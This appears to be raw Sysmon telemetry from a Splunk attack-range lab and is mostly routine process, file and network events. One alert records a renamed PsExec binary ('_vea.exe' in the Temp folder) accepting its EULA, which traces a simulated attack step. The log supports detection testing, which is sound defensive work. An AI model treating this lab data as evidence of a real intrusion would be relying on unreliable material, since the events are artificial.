10341000x8000000000000000296796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.274{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16BE-6216-0C07-000000003802}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.270{C8EA50B7-16BE-6216-0C07-000000003802}592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x8000000000000000296794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:13:02.227{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000296793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.094{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-16BE-6216-0B07-000000003802}5836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.094{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-16BE-6216-0B07-000000003802}5836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.079{C8EA50B7-16BE-6216-0B07-000000003802}58365264C:\Windows\system32\conhost.exe{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:02.028{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-16BE-6216-0B07-000000003802}5836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.996{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-16BE-6216-0B07-000000003802}5836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.959{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.958{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:01.958{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.913{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16BF-6216-0D07-000000003802}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.913{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.913{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.913{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.913{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.913{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-16BF-6216-0D07-000000003802}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.913{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16BF-6216-0D07-000000003802}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.914{C8EA50B7-16BF-6216-0D07-000000003802}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.897{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5493BB1CD083204B73A0589049F13F7,SHA256=02010DD44966684B1881D6622F76CE31648212C6E54F36DA559FA7B602C57A5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.198{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A210AEDAA602F67203148F3AE906E99,SHA256=1C246565F480490544F1AF4050E4C6AEA4F3E5026414AF547964DB81F8F8F163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:03.104{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9129E4E5C01A0EABBC0D3BC6DE1620F,SHA256=18CE9D2BE2979AE0966681AEB1D066CD582D6D0BA01268401AAD65A9F5E3BB61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:04.912{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AAC78EDAC89A5F02AABA5EB67F99C96,SHA256=3C6AE5005590BC560B56E0DA2866F3C152B68E04C1998FF3CC85F9B2A6510166,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:04.104{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AD6B28FB9D4C5405DAE3FF986524A73,SHA256=50611EBDB0F27F331498921386DADF0C30C6FC8CD30FC0FF73043C059AD4790D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:05.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=416C5F245D3C502EA227CF4C4957967E,SHA256=C42CC00430CB87E42EA8F5B5808B5FDCCFA695DDB1D5A060B8BBE615E5248DBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:05.151{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDC3B058DEB47EDC99AEA9C8EE8D0711,SHA256=17F7153719D614B2CF5BC13F07318321CCEAEF33FE8E4E9380E7206DA016A34E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.434{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49386-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.434{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49386-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000296821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:06.964{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1F64645B62C7648AA2F55419464A519,SHA256=2DD6F847333092EC8AC9D2ADF751E7DF5190BC9E18EA0FCA856F1702BB5D240D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:06.276{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DC36B4E5D84F618A2238F2094E6302C,SHA256=6DD2C14AB3D7F37124FC50073DBF3BD1E1D53641CA8323454702155035790DBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:03.633{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49387-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:07.980{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF2F2C4E7F5F07BE80BCF724794AE1FF,SHA256=726D9AD07B2697F613B28DB32DDA120029DA8025F4A721F56442F5D24D2BB227,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:05.695{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51604-false10.0.1.12-8000- 23542300x8000000000000000220768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:07.292{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2833786713D43236C62C2FBB4460581B,SHA256=B7F44B1EE80D3894FFE689FCFEF0D5E503E1BE2AD8724D3D2E01DFC97A2F261A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:08.980{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A51BAEDC9BE8262754541046859AAB,SHA256=F5966005B1275C86FD5E35D3DB706165D38CF20E93FF653C1790569637416CE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:08.354{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D05932DF2DF523733D60FB6E7975561,SHA256=47848C67D818AE3A6C18C6D3BAD6AB38F2851EF73DF4CCBC9C98AEEF4E299591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:09.982{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4409810BE3EB7009770FABF948F4FA11,SHA256=C9DDC0E967E3256D29B0B0A5CBB8360CC4653A675FF1A9D3EF36F366AA1096C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:09.385{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91071E21B31E65DED6696CEAB247C9B6,SHA256=0016959AC6A8A63FE6E96CF75E1BF8E166CF76BA9B219E5830C51F02C1C6AC10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:10.982{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program 